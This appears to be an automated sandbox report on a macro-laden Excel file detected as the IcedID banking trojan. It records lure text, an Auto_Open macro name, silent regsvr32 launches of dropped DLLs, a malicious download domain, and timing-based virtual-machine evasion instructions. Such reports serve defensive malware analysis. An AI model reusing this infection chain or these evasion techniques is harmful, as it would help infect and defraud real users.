Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://d1fgizr415o1r6.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://d1hemuljm71t2j.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://d1le29qyzha1u4.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://d1oqpvwii7b6rh.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://d1vo51ubqkiilx.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://d1yyh5dhdgifnx.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://d2908q01vomqb2.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://d2a6igt6jhaluh.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://d36cz9buwru1tt.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://d3borx6sfvnesb.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://d3ctxlq1ktw2nl.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://d3h2ozso0dirfl.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://dc.ads.linkedin.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://devices.amazonaws.com?hp=tile&so-exp=below
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://dftu77xade0tc.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://dgen8gghn3u86.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://dk261l6wntthl.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://docs.aws.amazon.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://download.stormacq.com/aws/podcast/
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://dpm.demdex.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://dts.podtrac.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://f0.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://fls-na.amazon.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://img.youtube.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://marketingplatform.google.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://media.amazonwebservices.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://mktg-apac.s3-ap-southeast-1.amazonaws.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://p.adsymptotic.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp	String found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&story=fico
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&story=zllw
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&sc_icampaign=
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&src=default
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://press.aboutamazon.com/press-releases/aws
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submit
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1WYTN19H6M239HCDYQASBX-Content-Ty
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://prod.log.shortbread.aws.dev
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://prod.tools.shortbread.aws.dev
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://s3.amazonaws.com/aws-messaging-pricing-information/
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://s3.amazonaws.com/aws-quickstart/
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://s3.amazonaws.com/public-pricing-agc/
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://spot-bid-advisor.s3.amazonaws.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://ssl-static.libsyn.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-cdn.jtvnw.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://static.doubleclick.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/awscloud
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://view-stage.us-west-2.prod.pricing.aws.a2z.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://website.spot.ec2.aws.a2z.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.jobs/aws
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.buzzsprout.com;
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com;
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.linkedin.com
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp	String found in binary or memory: https://www.twitch.tv/aws
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube-nocookie.com;
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp	String found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://yt3.ggpht.com;

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443

E-Banking Fraud:

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2836, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Document image extraction number: 0	Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0	Screenshot OCR: Enable Content button from the yellow bar above
Source: Document image extraction number: 1	Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 1	Screenshot OCR: Enable Content button from the yellow bar above

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\XTOWN.dll			Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_02101678 NtQuerySystemInformation,

4_2_02101678

Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_02101810	4_2_02101810
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_000007FEF8FB15D0	4_2_000007FEF8FB15D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_000007FEF8FB41BF	4_2_000007FEF8FB41BF

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
Source: Joe Sandbox View	Dropped File: C:\Users\user\XTOWN.dll 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8

Source: workbook.xml

Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr filterPrivacy="1" defaultThemeVersion="164011"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="22260" windowHeight="12645"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Sheet1" sheetId="8" r:id="rId2"/><sheet name="Sheet2" sheetId="4" r:id="rId3"/><sheet name="Sheet3" sheetId="2" r:id="rId4"/><sheet name="Sheet4" sheetId="3" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet3!$CA$13</definedName></definedNames><calcPr calcId="162913"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>

Source: 4.2.regsvr32.exe.2100000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 4.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 4.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 00000004.00000002.2086927834.0000000000190000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240

Source: regsvr32.exe, 00000004.00000002.2089523465.00000000031E0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSM@7/4@7/5

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$uhr908723097306.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC34E.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: uhr908723097306.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: uhr908723097306.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: uhr908723097306.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: uhr908723097306.xlsm	Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: XTOWN.dll.0.dr	Static PE information: real checksum: 0x1baf8 should be: 0x19d85
Source: lsdfik[1].fml.0.dr	Static PE information: real checksum: 0x1baf8 should be: 0x19d85

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\XTOWN.dll			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\XTOWN.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\XTOWN.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_02101E50

4_2_02101E50

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\System32\regsvr32.exe	RDTSC instruction interceptor: First address: 0000000002101E71 second address: 0000000002101E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
Source: C:\Windows\System32\regsvr32.exe	RDTSC instruction interceptor: First address: 0000000002101EAB second address: 0000000002101EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_02102434 rdtsc

4_2_02102434

Source: C:\Windows\System32\regsvr32.exe

Code function: GetAdaptersInfo,GetAdaptersInfo,

4_2_021027BC

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml

Jump to dropped file

Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	Binary or memory string: <a href="/rds/vmware/?hp=tile&so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	Binary or memory string: <a href="/vmware/?hp=tile&so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	Binary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	Binary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&tile=hybridsol" target="_blank" rel="noopener">
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	Binary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&tile=hybridsol" target="_blank" rel="noopener">

Source: C:\Windows\System32\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_02102434 rdtsc

4_2_02102434

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 143.204.91.74 187	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Domain query: astrocycle.download
Source: C:\Windows\System32\regsvr32.exe	Domain query: aws.amazon.com
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 172.67.213.115 80	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_021022DC LookupAccountNameW,

4_2_021022DC

Stealing of Sensitive Information:

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2836, type: MEMORY

Remote Access Functionality:

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2836, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	Path Interception	Process Injection11	Masquerading121	OS Credential Dumping	Security Software Discovery211	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution43	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer14	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting1	NTDS	System Owner/User Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol124	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Regsvr321	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Network Configuration Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery22	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
